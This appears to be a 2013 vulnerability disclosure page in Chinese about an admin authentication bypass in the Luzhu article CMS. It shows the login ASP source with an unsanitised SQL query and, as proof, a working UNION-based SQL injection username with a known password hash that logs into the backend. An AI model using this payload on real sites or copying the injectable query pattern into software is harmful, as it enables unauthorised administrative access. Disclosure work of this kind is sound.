漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:露珠文章管理系统后台权限绕过
提交时间:2013-08-21 12:22
修复时间:2013-11-19 12:23
公开时间:2013-11-19 12:23
漏洞类型:非授权访问/权限绕过
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
无
漏洞详情 披露状态:
2013-08-21: 积极联系厂商并且等待厂商认领中,细节不对外公开 2013-11-19: 厂商已经主动忽略漏洞,细节向公众公开
简要描述: 露珠CMS对获取参数处理不当,导致权限绕过。
详细说明: 代码如下:
<!--#include file="conn.asp"--> <link rel="stylesheet" href="adminimages/admin.css" type="text/css"> <%htwjm="admin.asp" Server.ScriptTimeOut=99999 select case request("luzhuba") 'case "":login() case "login":login() case "loginsave":loginsave() case "scazwj":scazwj() end select Public Sub login Response.Write("<style type=text/css>") Response.Write("body { background:#799AE1; font:Verdana 12px;") Response.Write("}") Response.Write("</style>") Response.Cookies("luzhubaht")("id") = "" Response.Cookies("luzhubaht")("mm") ="" Response.Cookies("luzhubaht")("xm") = "" Response.Cookies("luzhubaht")("sj") = "" session("luzhubahydj")="" dim num1 dim rndnum Randomize Do While Len(rndnum)<4 num1=CStr(Chr((57-48)*rnd+48)) rndnum=rndnum&num1 loop session("fjm")=rndnum sql="SELECT * FROM wzxx " set rs=server.createobject("adodb.recordset") rs.open sql,conn,1,1 wzxx=rs("wzm") if rs("zcqk")<>1 then luzhubaErr = True luzhuba_cn("<script language=javascript>alert('对不起,此程序不能使用!');this.location.href='index.asp';</script>") If luzhubaerr = True Then Exit Sub end if rs.close Response.Write("<title>"&wzxx&"后台管理</title>") Response.Write("<meta http-equiv='Content-Type' content='text/html; charset=gb2312'>") Response.Write("<meta name='keywords' content="&wzxx&"/>") Response.Write("<br><br><br><form action=""?luzhuba=loginsave"" method=post>") Response.Write("<form action=""?luzhuba=loginsave"" method=post>") Response.Write("<table width=""413"" border=""0"" align=""center"" cellpadding=""0"" cellspacing=""0"" bgcolor=""#EEEAD6"">") Response.Write("<tr>") Response.Write("<td height=""29"" colspan=""3"" background=""adminimages/topbg.gif""> <table width=""95%"" align=""right"" border=""0"" cellspacing=""0"" cellpadding=""0"">") Response.Write("<tr><td align=""left"" valign=""middle""><font color=""#FFFFFF""><B>"&wzxx&"后台管理入口</B></font></td>") Response.Write("<td width=""8%"" align=""right""><a href=""#"" onclick=""javascript:window.open('说明.txt','','width=640,height=300,left=100,top=10,scrollbars=yes')""><img src=""adminimages/help.gif"" align=""middle"" border=""0"" alt=""帮助文档""></a> </td>") Response.Write("</tr></table></td></tr><tr>") Response.Write("<td width=""3"" background=""adminimages/link.GIF""></td>") Response.Write("<td><table width=""100%"" border=""0"" cellspacing=""0"" cellpadding=""0"">") Response.Write("<tr><td height=""75"" background=""adminimages/bgtop.gif"" >") Response.Write("<table width=""100%"" height=""64"" border=""0"" cellpadding=""0"" cellspacing=""0"">") Response.Write("<tr><td width=""30%"" align=""left"" valign=""middle"" height=""46"" style=""font-size: 16px;""> <B><font color=""#FFFFFF""> "&wzxx&"</font></B> ") Response.Write("<font color=""#FFFFFF""><b> ") Response.Write("</b></font> </td></tr><tr><td width=""30%"" align=""left"" valign=""middle"" height=""18""> <font color=""#FFFFFF""><b> ") Response.Write("----因为我们专业,所以更出色!") Response.Write("</b></font> </td></tr></table></td></tr><tr>") Response.Write("<td><table width=""95%"" border=""0"" align=""center""><tr><td>") Response.Write("<fieldset><legend accesskey=""F"" align=""left"">登陆窗口</legend> ") Response.Write("<table width=""100%"" border=""0"" cellspacing=""2"" cellpadding=""2""><tr> ") Response.Write("<td width=""10%""> </td><td width=""20%"">用 户 名:</td>") Response.Write("<td><input type=""text"" name=""name"" size=""18"" ></td>") Response.Write("</tr><tr><td width=""10%""> </td><td width=""20%"">密 码:</td>") Response.Write("<td><input type=""password"" name=""password"" size=""19"" value="""&Request.Cookies("luzhubajsq")("pass")&"""></td></tr>") Response.Write("<tr><td width=""10%""> </td><td>附 加 码:</td>") Response.Write("<td><input type=""text"" name=""fjm"" size=""10"" value="""&rndnum&"""> 输入附加码<span style=""background-color: #D0D0BF;line-height:200%""><font color=#000000>"&rndnum&"</font></span> ") Response.Write("</td></tr><tr><td colspan=""3"" align=""center""><input type=""submit"" name=""submit"" value="" 登 陆 "" class=""tbutton""></td>") Response.Write("</tr></table></fieldset> </td></tr></table></td></tr></table></td><td width=""3"" background=""adminimages/link.GIF""></td>") Response.Write("</tr><tr><td height=""3"" background=""adminimages/linkbom.GIF"" colspan=""3""></td></tr></table>") Response.Write("<input type=""hidden"" value=""CheckLogin"" name=""method""></form>") end sub Public Sub scazwj Set fso = CreateObject("Scripting.FileSystemObject") fso.DeleteFile request.ServerVariables("APPL_PHYSICAL_PATH")&"setup.asp" Set fso = nothing response.redirect "?luzhuba=login" end sub Public Sub loginsave name=request.form("name") exec="select * from admin where name = '"+name+"' " set rs=server.createobject("adodb.recordset") rs.open exec,conn,1,3 if rs.eof and rs.bof then Response.Write("<script language=javascript>alert('对不起,您不是管理员,请您离开!');this.top.location.href='index.asp';</script>") else if rs("password")=md5(Trim(request.form("password")),16) then if request.form("fjm")<>session("fjm") then Response.Write("<script language=javascript>alert('附加码不对!');this.top.location.href='?luzhuba=login';</script>") else Session("a")=rs("a") session("luzhubahydj")=4 Response.Cookies("luzhubaht")("id")= rs("id") Response.Cookies("luzhubaht")("mm") =rs("password") Response.Cookies("luzhubaht")("xm") = rs("name") response.redirect ""&htwjm&"?luzhuba=" end if else Response.Write("<script language=javascript>alert('密码错误!');this.top.location.href='?luzhuba=login';</script>") end if end if rs.close set rs=nothing conn.close set conn=nothing end sub %>
漏洞证明: 访问: http://192.168.116.130/admin_login.asp?luzhuba=login 输入用户名: ' union select '1 or 1=1',2,'c0f1b6a831c399e2','100' from admin where '1'='1 密码:a 即可登陆后台。
修复方案: 漏洞回应
漏洞评价:
评论